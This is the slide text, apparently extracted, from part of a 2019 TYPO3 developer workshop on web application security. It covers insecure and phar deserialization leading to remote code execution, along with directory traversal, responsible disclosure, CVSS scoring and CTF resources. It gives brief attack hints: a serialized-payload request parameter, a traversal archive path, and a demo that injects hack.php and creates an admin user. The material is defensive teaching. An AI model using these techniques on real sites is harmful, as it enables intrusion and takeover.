  • 47. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Insecure Deserialization - TYPO3-CORE-SA-2019-020 47 ▪ https://typo3.org/security/advisory/typo3-core-sa-2019-020/ ▪ https://blog.ripstech.com/2019/typo3-overriding-the-database/ ▪ overrideVals[<table>][l10n_diffsource]=<serialized payload> ▪ addressed on June 25th, 2019
  • 48. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 48 Insecure Deserialization - Basics __destruct() saves content to filesystem
  • 49. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 49 Remote Code Execution #1 making use of FileCookieJar as attack container
  • 50. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 50 Remote Code Execution #1 prepare attack against TYPO3 backend
  • 51. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 51 Remote Code Execution #1 actual attack payload that shall be executed
  • 52. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 52 Remote Code Execution #1 XSRF token needs to be know (valid backend user required)
  • 53. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 53 Remote Code Execution #1 output of injected & executed /typo3/hack.php
  • 54. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 54 Remote Code Execution #1 … new admin user h4ck3r31 …
  • 55. Other™ 55TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 56. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Other™ random topics 56 ▪ File Upload ▪ check/deny extensions (file deny pattern) ▪ check mime-types - image/png, text/html, … ▪ Extbase controller actions ▪ user/group access needs individual handling ▪ classic: logged in user can access profile data of others ▪ Directory Traversal ▪ zip bundle.zip ../malicious.php ▪ depends on how it is extracted
  • 57. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org phar://… 57
  • 58. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 58 https://packagist.org/packages/typo3/phar-stream-wrapper
  • 59. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 59 ▪ usually used like
 require_once('phar://bundle.phar/vendor/autoload.php');
 $service = new BundleService(); ▪ Phar archives are vulnerable to insecure deserialisation ▪ all Phar archives in every PHP version (since 5.3) ▪ using “phar://“ stream wrapper is required here ▪ however, applies to regular file calls as well ▪ is_file(), file_exists(), fopen(), file_get_contents(), … ▪ is_file($_GET[‘fileName’]) // … user submitted data
  • 60. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 60 demo web application
  • 61. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 61 file does exist - correct
  • 62. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 62 result of implicit insecure deserialization
  • 63. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 63 Hybrid - Valid PNG file & Valid Phar archive
  • 64. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 64 building hybrid Phar archive
  • 65. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 65 PharStreamWrapper in TYPO3 core
  • 66. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 66 ▪ TYPO3CMSCoreIOPharStreamWrapperInterceptor ▪ TYPO3 core - Phar only in typo3conf/ext/ directories ▪ TYPO3PharStreamWrapper…PharExtensionInterceptor ▪ Phar only with file extension “.phar” ▪ TYPO3PharStreamWrapper…PharMetaDataInterceptor ▪ Phar only without serialized objects in meta-data
  • 67. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Vulnerability Reporting CVSSv3, Mitre & Co. 67
  • 68. How to report? 68TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 69. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org How to report a security vulnerability? 69 ▪ always report via mail to security@typo3.org (Security Team) ▪ don’t post potential attacks to Forge, Twitter, … (public media) ▪ inform security team in case vulnerabilities are leaked ▪ please be patient & wait for feedback ▪ approx first response time is ~8 hours
  • 70. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Responsible Disclosure Workflow 70 ▪ report vulnerability to vendor (here: security team) ▪ wait for feedback, questions or confirmation of this issue ▪ ask for status updates in case there is no activity ▪ declare deadline for full disclosure (e.g. 90 days) ▪ in case vendor does not take actions - public disclosure ▪ vendors (should) have interest to release security bulletins ▪ hiding vulnerability caused feeling of false security
  • 71. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 71 Responsible Disclosure Workflow https://blog.ripstech.com/2019/typo3-overriding-the-database/
  • 72. How to read reports? 72TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 73. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 73 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
  • 74. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 74 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
  • 75. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 75 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
  • 76. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org CVSSv3 example #1 76 ▪ CVE-2013-1937 ▪ phpMyAdmin Reflected Cross-site Scripting Vulnerability ▪ “Reflected cross-site scripting (XSS) vulnerabilities are present on the tbl_gis_visualization.php page in phpMyAdmin 3.5.x, before version 3.5.8. These allow remote attackers to inject arbitrary JavaScript or HTML via the (1) visualizationSettings[width] or (2) visualizationSettings[height] parameters.”
  • 77. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 77 CVSSv3 example #1 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
  • 78. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org CVSSv3 example #2 78 ▪ CVE-2016-1645 ▪ Google Chrome PDFium JPEG 2000 Remote Code Execution Vulnerability ▪ “Allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the victim must visit a malicious page or open a malicious file. Flaw exists within the handling of JPEG 2000 images. Specially crafted JPEG 2000 image embedded inside a PDF can force Google Chrome to write memory past the end of an allocated object. Attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.”
  • 79. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 79 CVSSv3 example #2 https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
  • 80. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 80 https://typo3.org/security/advisory/typo3-psa-2019-007/
  • 81. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 81 https://typo3.org/security/advisory/typo3-psa-2019-007/
  • 82. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 82 https://nvd.nist.gov/vuln/detail/CVE-2019-11831
  • 83. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 83 https://nvd.nist.gov/vuln/detail/CVE-2019-11831
  • 84. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org TYPO3 Security Team 84
  • 85. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 85 ▪ triage and answer reports ▪ communicate with reporters (individuals, pen-testers) ▪ forward information to maintainers (core, extension author, …) ▪ frankly remind people in case activity is kind of low ▪ coordinate releases & release dates ▪ compile information into security bulletins / announcements ▪ educate & raise awareness in teams & community
  • 86. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Capture the Flag 86
  • 87. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 87 https://www.root-me.org/en/Challenges/Web-Server/
  • 88. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 88 https://ctf.hacker101.com/ctf
  • 89. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 89 ▪ https://www.root-me.org/en/Challenges/Web-Server/SQL- injection-Error # might work with SQLmap ▪ https://ctf.hacker101.com/ctf/launch/7 # check public API
  • 90. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org References 90 ▪ Running an SQL Injection Attack: // “Computerphile“, nice series
 https://www.youtube.com/watch?v=ciNHn38EyRc ▪ WordPress WPDB SQL Injection: // nice, on “custom” escaping
 https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb- sql-injection-technical.html ▪ CVSSv3 Examples:
 https://www.first.org/cvss/v3.0/examples